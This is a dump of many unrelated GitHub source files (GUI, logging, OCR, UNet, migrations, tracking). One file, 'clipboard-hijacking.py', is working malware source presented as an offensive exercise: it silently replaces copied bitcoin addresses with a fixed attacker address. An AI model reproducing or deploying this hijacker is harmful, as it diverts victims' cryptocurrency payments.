\"Man\":\n self.keyboard(False)\n elif selection == \"Par\":\n self.keyboard(True)\n elif selection == \"Set\":\n __addon__.openSettings()\n self.set_allparam()\n self.on_run()\n else:\n self.service = selection\n self.next = list(self.service_list)\n self.Search_Subtitles()\n\n def onFocus( self, controlId ):\n if controlId == 150:\n if not self.focused:\n try:\n select_index = self.service_list.index(self.service)\n except IndexError:\n select_index = 0\n self.getControl( SERVICES_LIST ).selectItem(select_index)\n self.focused = True\n else:\n self.focused = False\n\n def onAction( self, action ):\n if ( action.getId() in CANCEL_DIALOG):\n self.close()\n\n","repo_name":"amet/script.xbmc.subtitles","sub_path":"script.xbmc.subtitles/resources/lib/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":22552,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"53"} +{"seq_id":"10950638998","text":"import os\nimport requests\nimport io\nimport logging\nimport sys\nimport signal\nimport json\n# don't remove, it loads the configuration\nimport logger\n\n\ndef main():\n # User provided variables\n github_repo = os.environ.get(\"INPUT_GITHUB_REPOSITORY\")\n try:\n assert github_repo not in (None, '')\n except:\n output = \"The input github repository is not set\"\n print(f\"Error: {output}\")\n sys.exit(-1)\n\n github_run_id = os.environ.get(\"INPUT_GITHUB_RUN_ID\")\n try:\n assert github_run_id not in (None, '')\n except:\n output = \"The input github run id is not set\"\n print(f\"Error: {output}\")\n sys.exit(-1)\n\n github_token = os.environ.get(\"INPUT_GITHUB_TOKEN\")\n try:\n assert github_token not in (None, '')\n except:\n output = \"The input github token is not set\"\n print(f\"Error: {output}\")\n sys.exit(-1)\n\n github_org = os.environ.get(\"INPUT_GITHUB_ORG\")\n try:\n assert github_org not in (None, '')\n except:\n output = \"The input github org is not set\"\n print(f\"Error: {output}\")\n sys.exit(-1)\n elastic_logger = logging.getLogger(\"elastic\")\n metadata_url = f\"https://api.github.com/repos/{github_org}/{github_repo}/actions/runs/{github_run_id}\"\n try:\n r = requests.get(metadata_url, stream=True, headers={\n \"Authorization\": f\"token {github_token}\"\n })\n metadata = json.loads(r.content)\n jobs_url = metadata.get('jobs_url')\n metadata.pop('repository')\n metadata.pop('head_repository')\n metadata = {\n \"metadata_\" + k: v for k,v in metadata.items()\n }\n except 
Exception as exc:\n output = \"Failed to get run metadata\" + str(exc)\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n\n # extract all done jobs\n jobs = {}\n try:\n jobs_response = requests.get(jobs_url, headers={\n \"Authorization\": f\"token {github_token}\"\n })\n if not jobs_response.ok:\n raise Exception(\"Failed to get run jobs\")\n _jobs = json.loads(jobs_response.content)\n for job in _jobs.get('jobs'):\n job_id = job.get('id')\n # no logs for jobs that weren't completed\n if not job.get('status') == 'completed':\n continue\n jobs[job_id] = {\n \"job_id\": job_id,\n \"job_name\": job.get('name'),\n \"job_status\": job.get('status'),\n \"job_conclusion\": job.get('conclusion'),\n \"job_steps\": job.get('steps')\n }\n # log this metadata to elastic\n elastic_logger.info(\"Job metadata\", extra={\n **jobs.get(job_id)\n })\n except Exception as exc:\n output = \"Failed to get run jobs\" + str(exc)\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n\n for job_id in jobs:\n try:\n job_logs_url = f\"https://api.github.com/repos/{github_org}/{github_repo}/actions/jobs/{job_id}/logs\"\n r = requests.get(job_logs_url, stream=True, headers={\n \"Authorization\": f\"token {github_token}\"\n })\n if not r.ok:\n output = \"Failed to download logs\"\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n\n logs = io.BytesIO(r.content)\n for log in logs:\n elastic_logger.info(log.strip().decode(), extra={\n \"job_id\": job_id,\n \"job_name\": jobs.get(job_id).get('job_name'),\n \"repo\": github_repo,\n \"run_id\": github_run_id,\n **metadata\n })\n\n except requests.exceptions.HTTPError as errh:\n output = \"GITHUB API Http Error:\" + str(errh)\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n except requests.exceptions.ConnectionError as errc:\n output = \"GITHUB API Error Connecting:\" + str(errc)\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n except requests.exceptions.Timeout as errt:\n output = \"Timeout Error:\" + str(errt)\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n except requests.exceptions.RequestException as err:\n output = \"GITHUB API Non catched error connecting:\" + str(err)\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n\n\ndef keyboard_interrupt_bug(signal, frame):\n print('keyboard interrupt')\n pass\n\n\nsignal.signal(signal.SIGINT, keyboard_interrupt_bug)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"shahargl/upload-github-workflow-logs-to-elastic","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"11428813392","text":"from selenium import webdriver\ndriver = webdriver.Chrome(\"../resources/chromedriver.exe\")\n\n# from selenium import webdriver\n# driver = webdriver.Chrome(\"../resources/chromedriver.exe\")\n\nurl = \"http://www.google.com\"\n\ndriver.maximize_window()\ndriver.get(url)\nprint(driver.title)\n# assert driver.title == \"Yahoo\"\n# assert driver.title == \"Google\"\nassert driver.title == \"Google\", f\"page title {driver.title} did not match the expected 
title\"\nprint(\"Thanks\")\ndriver.close()","repo_name":"srbansal/WorkWithTeam1","sub_path":"webdriver_launch_ch_browser_url.py","file_name":"webdriver_launch_ch_browser_url.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34092526015","text":"from api.alpha_vantage.AlphaVantageAPI import AlphaVantageAPI\nfrom client.util.HTMLUtil import HTMLUtil\nfrom client.util.html.LinkBuider import LinkBuilder\nfrom client.util.html.ScrollableDiv import ScrollableDiv\nfrom client.util.html.TableBuilder import TableBuilder\nfrom reports.Sorting import Sorting\n\n\nclass AlbinsonianHTML:\n @staticmethod\n def get_ticker_table(tickers_found, lookup_thresh=3, force_reload=False):\n table_header = ['Ticker', 'Mentions', 'Name', 'Description', 'Movement', 'Links']\n\n norm_factor = 0\n for tf in tickers_found:\n norm_factor += tickers_found[tf]['count']\n\n table_values = []\n for tf in tickers_found:\n addendum = ''\n counter = 0\n for submission in tickers_found[tf]['submissions']:\n addendum += LinkBuilder('[%d] - %d' % (counter, submission['score']),\n 'https://www.reddit.com' + submission['link']).compile() + '
'\n counter += 1\n\n addendum = ScrollableDiv(addendum, '5rem').compile()\n\n desc = '...'\n if 'description' in tickers_found[tf] and tickers_found[tf]['description'] is not None:\n desc = tickers_found[tf]['description']\n\n if tickers_found[tf]['count'] >= lookup_thresh - 1:\n print('crawling AV for %s' % tf)\n pct_change = AlphaVantageAPI().get_parsed_quote(tf, force_reload)['10. change percent']\n pct_in_tag = HTMLUtil.wrap_in_tag(pct_change, 'div',\n attributes={'class': 'negative' if '-' in pct_change else 'positive'})\n else:\n pct_in_tag = 'N/A'\n\n table_values.append([tf, tickers_found[tf]['count'], tickers_found[tf]['name'],\n desc[:200] + '...', pct_in_tag, addendum])\n\n table_values.sort(key=Sorting.sort_by_mentions, reverse=True)\n return TableBuilder(headers=table_header, rows=table_values)","repo_name":"michaelalbinson/glowing-pancake-praw","sub_path":"experiments/michael/AlbinsonianHTML.py","file_name":"AlbinsonianHTML.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70250893290","text":"from .adjacent_list import Graph\n\n\ndef build_graph(word_file):\n d = {}\n g = Graph()\n with open(word_file, \"r\") as file:\n for line in file:\n word = line[:-1]\n for i in range(len(word)):\n bucket = word[:i] + \"_\" + word[i+1:]\n if bucket in d:\n d[bucket].append(word)\n else:\n d[bucket] = [word]\n for bucket in d:\n for word_1 in d[bucket]:\n for word_2 in d[bucket]:\n if word_1 != word_2:\n g.add_edge(word_1, word_2)","repo_name":"chcorophyll/algorithm_4th","sub_path":"PekingUniversity/graph/word_ladder.py","file_name":"word_ladder.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22736556512","text":"# Handler for \"other\" quantities, such as collision frequencies,\n# bounce averages etc.\n\nimport numpy as np\nfrom .. 
DREAMException import DREAMException\n\n\nclass OtherQuantities:\n \n \n # Here, we keep a list of the possible settings found in DREAM.\n # This allows to check the input the user gives, and emit warnings\n # if the user specifies an unrecognized quantity.\n QUANTITIES = [\n 'all',\n 'fluid',\n 'fluid/conductivity',\n 'fluid/Eceff',\n 'fluid/GammaAva',\n 'fluid/gammaCompton', 'fluid/gammaDreicer', 'fluid/gammaTritium', 'fluid/gammaHottail',\n 'fluid/Lambda_hypres',\n 'fluid/lnLambdaC', 'fluid/lnLambdaT',\n 'fluid/nusnuDatPstar',\n 'fluid/pCrit', 'fluid/pCritHottail',\n 'fluid/pStar',\n 'fluid/qR0',\n 'fluid/radiation',\n 'fluid/runawayRate',\n 'fluid/Tcold_ohmic',\n 'fluid/Tcold_fhot_coll',\n 'fluid/Tcold_fre_coll',\n 'fluid/Tcold_transport',\n 'fluid/Tcold_radiation',\n# 'fluid/Tcold_radiationFromNuS',\n 'fluid/Tcold_ion_coll',\n 'fluid/W_hot',\n 'fluid/W_re',\n 'energy',\n 'hottail/Ar', 'hottail/Ap1', 'hottail/Ap2',\n 'hottail/Drr', 'hottail/Dpp', 'hottail/Dpx', 'hottail/Dxp', 'hottail/Dxx',\n 'hottail/timevaryingb_Ap2',\n 'hottail/lnLambda_ee_f1', 'hottail/lnLambda_ee_f2',\n 'hottail/lnLambda_ei_f1', 'hottail/lnLambda_ei_f2',\n 'hottail/nu_D_f1', 'hottail/nu_D_f2',\n 'hottail/nu_s_f1', 'hottail/nu_s_f2',\n 'hottail/nu_par_f1', 'hottail/nu_par_f2',\n 'hottail/S_ava', 'hottail/S_compton', 'hottail/S_tritium',\n 'hottail/synchrotron_loss',\n 'lnLambda',\n 'nu_s',\n 'nu_D',\n 'runaway/Ar', 'runaway/Ap1', 'runaway/Ap2',\n 'runaway/Drr', 'runaway/Dpp', 'runaway/Dpx', 'runaway/Dxp', 'runaway/Dxx',\n 'runaway/timevaryingb_Ap2',\n 'runaway/lnLambda_ee_f1', 'runaway/lnLambda_ee_f2',\n 'runaway/lnLambda_ei_f1', 'runaway/lnLambda_ei_f2',\n 'runaway/nu_D_f1', 'runaway/nu_D_f2',\n 'runaway/nu_s_f1', 'runaway/nu_s_f2',\n 'runaway/nu_par_f1', 'runaway/nu_par_f2',\n 'runaway/S_ava', 'runaway/synchrotron_loss',\n 'scalar',\n 'scalar/E_mag',\n 'scalar/L_i',\n 'scalar/L_i_flux',\n 'scalar/l_i',\n 'scalar/radialloss_n_re',\n 'scalar/energyloss_T_cold',\n 'scalar/radialloss_f_re',\n 'scalar/radialloss_f_hot',\n 'scalar/energyloss_f_re',\n 'scalar/energyloss_f_hot', \n 'ripple',\n 'transport'\n ]\n\n def __init__(self):\n \"\"\"\n Constructor.\n \"\"\"\n self._include = list()\n\n \n def include(self, *args):\n \"\"\"\n Include one or more \"other\" quantities in the output.\n \"\"\"\n for a in args:\n if type(a) == list:\n self.include(*a)\n elif type(a) == str:\n if a not in self.QUANTITIES:\n print(\"WARNING: Unrecognized other quantity '{}'. 
Is it perhaps misspelled?\".format(a))\n\n self._include.append(a)\n else:\n raise DREAMException(\"other: Unrecognized type of argument: '{}'.\".format(type(a)))\n\n\n def fromdict(self, data):\n \"\"\"\n Load these settings from the given dictionary.\n \"\"\"\n inc = []\n if 'include' in data:\n inc = data['include'].split(';')\n\n if len(inc) > 0 and inc[-1] == '':\n inc = inc[:-1]\n\n self.include(inc)\n\n\n def todict(self, verify=True):\n \"\"\"\n Returns a dict representing the settings in this object.\n \"\"\"\n if verify:\n self.verifySettings()\n\n if len(self._include) == 0:\n return {}\n else:\n return {'include': ';'.join(self._include)}\n\n\n def verifySettings(self):\n \"\"\"\n Verify that these settings are consistent.\n \"\"\"\n pass\n\n\n","repo_name":"chalmersplasmatheory/DREAM","sub_path":"py/DREAM/Settings/OtherQuantities.py","file_name":"OtherQuantities.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"22238753185","text":"import keras_ocr\nimport cv2\nimport os\nimport torch\nimport sys\nimport numpy as np\n# ensure we are running on the correct gpu\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"6\" # (xxxx is your specific GPU ID)\nif not torch.cuda.is_available() or torch.cuda.device_count() != 1:\n print('exiting')\n sys.exit()\nelse:\n print('GPU is being properly used')\n\n\n# keras-ocr will automatically download pretrained\n# weights for the detector and recognizer.\npipeline = keras_ocr.pipeline.Pipeline()\n\n\ndef preprocess(img):\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # img = cv2.resize(img, (0, 0), fx=2.0, fy=2.0)\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\n img = clahe.apply(img)\n img = 255-img # invert image. 
# tesseract prefers black text on white background\n\n    ret, img = cv2.threshold(img, 127, 255, cv2.THRESH_TOZERO)\n\n    img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)\n\n    return img\n\n\ndef updateAccuracies(pebbleActualNumber, digitAccuracy, confusionMatrix, predLabels, img):\n    print('labels:', predLabels)\n    numberIsIncorrect = False\n    scoreCode = ''\n    for a in range(len(predLabels)):\n        if predLabels[a].isdigit():\n            actualDigit = pebbleActualNumber[a]\n            predDigit = int(predLabels[a])\n\n            # check if digit is correct\n            if actualDigit == predDigit:\n                # now update accordingly\n                digitAccuracy[5] += 1\n                scoreCode += '6'\n                confusionMatrix[actualDigit][predDigit] += 1\n            else:\n                numberIsIncorrect = True\n                digitAccuracy[4] += 1\n                scoreCode += '5'\n                confusionMatrix[actualDigit][predDigit] += 1\n\n    if numberIsIncorrect:\n        digitAccuracy[6] += 1\n        scoreCode += '7'\n    else:\n        digitAccuracy[7] += 1\n        scoreCode += '8'\n\n    # put actual number in image\n    scoring = str(pebbleActualNumber[0]) + str(pebbleActualNumber[1]\n                                               ) + str(pebbleActualNumber[2]) + \":\" + scoreCode\n    # setup text\n    font = cv2.FONT_HERSHEY_SIMPLEX\n    # get boundary of this text\n    textsize = cv2.getTextSize(scoring, font, 1, 2)[0]\n\n    # get coords based on boundary\n    textX = int((img.shape[1] - textsize[0]) / 2)\n    textY = int((img.shape[0] + textsize[1]) / 2)\n    cv2.putText(img, scoring, (textX, img.shape[0]-75), cv2.FONT_HERSHEY_SIMPLEX,\n                1, (255, 255, 255), thickness=2)\n\n    return digitAccuracy, confusionMatrix, img\n\n\ndef patch_words(pred_groups):\n    # need to sort pred groups by x value\n    # split pred and coords\n    preds = []\n    for pred_group in pred_groups:\n        preds.append([pred_group[1][0][0], pred_group[0]])\n    # sort by first x value\n    preds = sorted(preds)\n\n    # create prediction only from numbers\n    prediction = ''\n    for (x, word) in preds:\n        prediction += ''.join(filter(lambda i: i.isdigit(), word))\n    return prediction\n\n# read through each image and predict\n\n\ndef keras_prediction_with_accuracy(img, pebbleActualNumber, digitAccuracy, confusionMatrix):\n    img = preprocess(img)\n\n    prediction_groups = pipeline.recognize([img])\n    prediction = None\n    if len(prediction_groups) == 1:\n        prediction = patch_words(prediction_groups[0])\n\n    if prediction is None:\n        cv2.putText(img, 'NONE', (5, 100), cv2.FONT_HERSHEY_SIMPLEX,\n                    4, (0, 0, 255), thickness=10)\n    else:\n        # split into individual digits\n        labels = [ch for ch in prediction]\n\n        font = cv2.FONT_HERSHEY_SIMPLEX\n        predText = \"Pred:\"+str(prediction)\n        # get boundary of this text\n        textsize = cv2.getTextSize(predText, font, 1, 2)[0]\n\n        # get coords based on boundary\n        textX = int((img.shape[1] - textsize[0]) / 2)\n        textY = int((img.shape[0] + textsize[1]) / 2)\n        cv2.putText(img, predText, (textX, img.shape[0]-25), cv2.FONT_HERSHEY_SIMPLEX,\n                    1, (255, 255, 255), thickness=2)\n\n        # add in scoring\n        if len(labels) == 3:\n            updateAccuracies(pebbleActualNumber, digitAccuracy,\n                             confusionMatrix, labels, img)\n\n    return img, prediction, digitAccuracy, confusionMatrix\n","repo_name":"roshankenia/InletOutletDetection","sub_path":"speedy_kerasocr_util.py","file_name":"speedy_kerasocr_util.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16552171148","text":"# -*-coding:UTF-8 -*\n# !/usr/bin/env python\n\n\"\"\" Exercise: clipboard hijacking\n\nIn this exercise, we will simulate a piece of malware that continuously watches the contents of the clipboard.\nAs soon as the victim 
copies a bitcoin address, our program will replace it with another, predefined address.\n\"\"\"\n\nimport platform\nfrom subprocess import Popen, PIPE\n\ntry:\n\t# Python2\n\timport Tkinter as tk\nexcept ImportError:\n\t# Python3\n\timport tkinter as tk\n\n\n# support charity: https://thewaterproject.org/\nDEST_ADDR_bin = b'1HesYJSP1QqcyPEjnQ9vzBL1wujruNGe7R'\nDEST_ADDR = \"1HesYJSP1QqcyPEjnQ9vzBL1wujruNGe7R\"\n\n# test addr = 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy\n\ndef get_clipboard():\n\tp = Popen(['pbpaste'], stdout=PIPE) # access clipboard\n\tdata = str(p.stdout.read()) # read data on clipboard and convert to string\n\tif len(data) > 33: # if bitcoin\n\t\tswap_address(data)\n\n\ndef swap_address(data):\n\tp = Popen(['pbcopy'], stdin=PIPE) # access clipboard\n\tp.stdin.write(DEST_ADDR_bin) # write destination address\n\tp.stdin.close() # close clipboard\n\n\ndef main():\n\toperating_system = platform.system()\n\n\tif operating_system == \"Darwin\":\n\t\twhile True:\n\t\t\tget_clipboard()\n\n\telif (operating_system == \"Windows\") or (operating_system == \"Linux\"):\n\t\ttk_object = tk.Tk()\n\t\ttk_object.withdraw() \t\t# keep the window from showing up\n\t\twhile True:\n\t\t\tdata = tk_object.clipboard_get()\n\t\t\tif len(data) > 33: # if bitcoin\n\t\t\t\ttk_object.clipboard_clear()\n\t\t\t\ttk_object.clipboard_append(DEST_ADDR)\n\t\tpass\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"GrayDevs/Python4Security","sub_path":"py4Sec/Offensive/post-exploitation/clipboard-hijacking.py","file_name":"clipboard-hijacking.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74871391526","text":"from numpy import identity\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass UnetModel(tf.keras.Model):\n    def __init__(self, seed):\n        super().__init__()\n\n        self._seed = seed\n        self._segmentation_classes = 4\n        self._inner_features = 8\n\n        ### Define the UNet model ###\n\n        # https://lmb.informatik.uni-freiburg.de/people/ronneber/u-net/u-net-architecture.png\n\n        def upsample(output_features, x):\n            # TODO: try experimenting with different upsamplings\n            # a) transposed upconv\n            # b) bilinear interpolation\n            # ...\n            x = tf.keras.layers.UpSampling2D(interpolation=\"nearest\")(x)\n            return tf.keras.layers.Conv2D(\n                output_features, kernel_size=1,\n                activation=\"relu\", padding=\"same\"\n            )(x)\n\n        def unet_level(depth, max_depth, x):\n            level_features = self._inner_features * (1 << depth)\n\n            x = tf.keras.layers.Conv2D(\n                level_features, kernel_size=3,\n                activation=\"relu\", padding=\"same\"\n            )(x)\n            x = tf.keras.layers.Conv2D(\n                level_features, kernel_size=3,\n                activation=\"relu\", padding=\"same\"\n            )(x)\n\n            if depth == max_depth: # lowest level stops the recursion\n                return x\n\n            skip_connection = x\n\n            x = tf.keras.layers.MaxPool2D()(x)\n            x = unet_level(depth + 1, max_depth, x)\n            x = upsample(output_features=level_features, x=x)\n\n            x = tf.concat((skip_connection, x), axis=3)\n\n            x = tf.keras.layers.Conv2D(\n                level_features, kernel_size=3,\n                activation=\"relu\", padding=\"same\"\n            )(x)\n            x = tf.keras.layers.Conv2D(\n                level_features, kernel_size=3,\n                activation=\"relu\", padding=\"same\"\n            )(x)\n\n            return x\n\n        # input image\n        unet_input = tf.keras.layers.Input(\n            shape=(28, 28, 1),\n            name=\"unet_input\"\n        )\n\n        # unet\n        x = unet_level(depth=0, max_depth=2, x=unet_input)\n\n        # reshape to output classes (sigmoid conv 
1x1)\n unet_output = tf.keras.layers.Conv2D(\n self._segmentation_classes, kernel_size=1,\n activation=\"sigmoid\", padding=\"same\"\n )(x)\n\n # define the model (in two output variants)\n self.unet = tf.keras.Model(\n inputs=unet_input,\n outputs=unet_output,\n name=\"unet\"\n )\n\n # print the model\n tf.keras.utils.plot_model(self.unet, \"model.png\", show_shapes=True)\n\n # TODO:\n # image -> seg mask\n # seg mask -> seg mask, identity on the same model\n # (but only with the k-most prominent masks)\n # a) on the mask as is\n # b) on the mask with noise where zero\n\n @tf.function\n def train_step(self, batch):\n images, labels = batch\n\n @tf.function\n def build_mask_inputs_slice(batch_slice):\n class_prominences = tf.math.reduce_sum(batch_slice, axis=(0, 1))\n largest_class_index = tf.math.argmax(class_prominences)\n return batch_slice[:, :, largest_class_index]\n\n @tf.function\n def build_mask_outputs_slice(batch_slice):\n class_prominences = tf.math.reduce_sum(batch_slice, axis=(0, 1))\n largest_class_index = tf.math.argmax(class_prominences)\n\n batch_slice_transposed = tf.transpose(batch_slice, [2, 0, 1])\n outputs_slice_transposed = tf.tensor_scatter_nd_update(\n tf.zeros(\n shape=batch_slice_transposed.shape,\n dtype=batch_slice_transposed.dtype\n ),\n indices=[[largest_class_index]],\n updates=[batch_slice_transposed[largest_class_index]]\n )\n outputs_slice = tf.transpose(outputs_slice_transposed, [1, 2, 0])\n\n return outputs_slice\n\n with tf.GradientTape() as tape:\n \n ### Segmentation pass ###\n\n pass_1_input = images\n pass_1_output = self.unet(images, training=True)\n\n ### Mask training pass ###\n\n # pass_2_input = tf.map_fn(\n # build_mask_inputs_slice,\n # pass_1_output\n # )\n # pass_2_expected_output = tf.map_fn(\n # build_mask_outputs_slice,\n # pass_1_output\n # )\n # pass_2_actual_output = self.unet(pass_2_input, training=True)\n\n ### Compute losses ###\n\n # all masks should reconstruct the input image\n identity_loss = self.compiled_loss(\n y_true=tf.concat(\n [pass_1_input * 0] + \n [pass_1_input for _ in range(self._segmentation_classes - 1)],\n axis=3\n ),\n #y_true = pass_1_input,\n y_pred=pass_1_output,\n regularization_losses=self.losses\n )\n # identity_loss = tf.losses.BinaryCrossentropy(from_logits=False)(\n # y_true=tf.stack(\n # [pass_1_input for _ in range(self._segmentation_classes)],\n # axis=3\n # ),\n # y_pred=pass_1_output\n # )\n\n # masks should (when combined) reconstruct the image\n # reconstruction_loss = tf.losses.BinaryCrossentropy(from_logits=True)(\n # y_true=pass_1_input,\n # y_pred=tf.expand_dims(\n # tf.reduce_sum(pass_1_output_logits, axis=3),\n # axis=3\n # )\n # )\n\n # mask should be classified into its own class\n # mask_stabilization_loss = tf.losses.BinaryCrossentropy(from_logits=False)(\n # y_true=pass_2_expected_output,\n # y_pred=pass_2_actual_output\n # )\n\n # the proper mask should light up the most\n # supervised_loss = tf.losses.SparseCategoricalCrossentropy(from_logits=True)(\n # y_true=labels,\n # y_pred=tf.reduce_mean(pass_1_output_logits, axis=(1, 2))\n # )\n \n def prepare_sup_output(args):\n input_slice, label = args\n channel_stack = tf.concat(\n [\n #input_slice\n input_slice * tf.cond(\n tf.constant(i, dtype=tf.int64) == label,\n lambda: 1.0,\n lambda: 0.0\n )\n for i in range(self._segmentation_classes)\n ],\n axis=2\n )\n return channel_stack, label\n\n supervised_output, _ = tf.map_fn(\n fn=prepare_sup_output,\n elems=(pass_1_input, labels)\n )\n \n supervised_loss = 
tf.losses.BinaryCrossentropy(from_logits=False)(\n y_true=supervised_output,\n y_pred=pass_1_output\n )\n\n #loss = reconstruction_loss + mask_stabilization_loss\n loss = supervised_loss\n\n gradients = tape.gradient(loss, self.trainable_weights)\n self.optimizer.apply_gradients(zip(gradients, self.trainable_weights))\n\n return {\n # \"reconstruction_loss\": reconstruction_loss,\n # \"mask_stabilization_loss\": mask_stabilization_loss,\n # \"identity_loss\": identity_loss,\n # \"supervised_loss\": supervised_loss,\n \"loss\": loss\n }\n\n def scatter(self, epoch, images, labels):\n masks = self.unet(images, training=False)\n \n graphics = []\n for i in range(images.shape[0]):\n image = images[i]\n image_masks = masks[i]\n image_masks_transposed = tf.transpose(image_masks, [2, 0, 1])\n graphic = tf.concat(\n [image[:,:,0]] + [t for t in image_masks_transposed],\n axis=1\n ).numpy()\n graphic[:,27] = 1 # draw a separation line\n graphics.append(graphic)\n\n final_graphic = np.concatenate(graphics, axis=0)\n\n # save the image\n plt.figure(figsize=(10, 10))\n plt.imshow(np.dstack([final_graphic, final_graphic, final_graphic]))\n plt.savefig(\n \"fig/masks-{:02d}.png\".format(epoch),\n bbox_inches=\"tight\"\n )\n plt.clf()\n","repo_name":"Jirka-Mayer/MasterThesis","sub_path":"playground/04-unet-seg/unet_model.py","file_name":"unet_model.py","file_ext":"py","file_size_in_byte":8726,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"28395388522","text":"\"\"\"empty message\n\nRevision ID: 481d9eabc6e7\nRevises: 2dbe78a7948b\nCreate Date: 2016-10-08 21:18:30.878842\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '481d9eabc6e7'\ndown_revision = '2dbe78a7948b'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_index(op.f('ix_comments_label'), 'comments', ['label'], unique=False)\n op.create_index(op.f('ix_comments_time'), 'comments', ['time'], unique=False)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n    op.drop_index(op.f('ix_comments_time'), table_name='comments')\n    op.drop_index(op.f('ix_comments_label'), table_name='comments')\n    ### end Alembic commands ###\n","repo_name":"tentangdata/ig","sub_path":"migrations/versions/481d9eabc6e7_.py","file_name":"481d9eabc6e7_.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33713830458","text":"def go(idx, tmp):\r\n    if dic[idx] not in tmp:\r\n        tmp.append(dic[idx])\r\n        go(dic[idx], tmp)\r\n    return tmp\r\n\r\nn = int(input())\r\ndic = {}\r\nfor i in range(1, n+1):\r\n    dic[i] = int(input())\r\n\r\nres = {}\r\nfor i in range(1, n+1):\r\n    tmp = [i]\r\n    tmp.append(dic[i])\r\n    res[i] = go(dic[i], tmp)\r\n\r\nresult = []\r\nfor i in res.keys():\r\n    result.append([i, len(res[i])])\r\n\r\nresult.sort(key=lambda x:(-x[1],x[0]))\r\nprint(result[0][0])","repo_name":"aeriheo/study","sub_path":"3월 5주차/BOJ_3182.py","file_name":"BOJ_3182.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40600800780","text":"from hammiu import CentroidTracker\nimport imutils\nimport argparse\nimport time\nimport cv2\nimport numpy as np\n\n\"\"\"This script can also use other face detectors, such as YOLO...\"\"\"\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--prototxt\", required=True, help=\"path to Caffe 'deploy' prototxt file\")\nap.add_argument(\"-m\", \"--model\", required=True, help=\"path to Caffe pre-trained model\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.5, help=\"minimum probability to filter weak detections\")\nargs = vars(ap.parse_args())\n\n# initialize the centroid tracker and the frame dimensions\nct = CentroidTracker()\n(H, W) = (None, None)\n\n# load model\nprint(\"[INFO] loading model...\")\nnet = cv2.dnn.readNetFromCaffe(args[\"prototxt\"], args[\"model\"])\n\n# load webcam\nvideo = cv2.VideoCapture(0)\n\n# grab the frames\nwhile True:\n    ok, frame = video.read()\n\n    # could not grab a frame\n    if not ok:\n        break\n\n    # resize so it runs faster\n    # frame = imutils.resize(frame, width=500)\n\n    # grab the frame dimensions if they are None\n    if H is None and W is None:\n        (H, W) = frame.shape[:2]\n\n    # create a blob from the image - the input to the network\n    blob = cv2.dnn.blobFromImage(frame, 1.0, (W, H), (104.0, 177.0, 123.0))\n    # pass the blob through the network, get the predictions, initialize the list of bounding boxes\n    net.setInput(blob)\n    detections = net.forward()\n    rects = []\n\n    # loop over the detections\n    for i in range(0, detections.shape[2]):\n        # filter out detections with a low probability, keep only the confident ones\n        if detections[0, 0, i, 2] > args[\"confidence\"]:\n            # compute the (x, y) coordinates of the bounding box and append it to rects\n            box = detections[0, 0, i, 3:7] * np.array([W, H, W, H])\n            rects.append(box.astype(\"int\")) # cast to int since these are pixel coordinates\n\n            # draw a bounding box around the object so we can visualize it\n            (startX, startY, endX, endY) = box.astype(\"int\")\n            cv2.rectangle(frame, (startX, startY), (endX, endY), (0, 255, 0), 2)\n\n    # update the centroid tracker with the bounding boxes just computed\n    objects = ct.update(rects)\n\n    # loop over the tracked objects\n    for (objectID, centroid) in objects.items():\n        # draw the object ID and the centroid on the frame\n        text = \"ID {}\".format(objectID)\n        cv2.putText(frame, text, (centroid[0] - 10, centroid[1] - 10), cv2.FONT_HERSHEY_SIMPLEX, 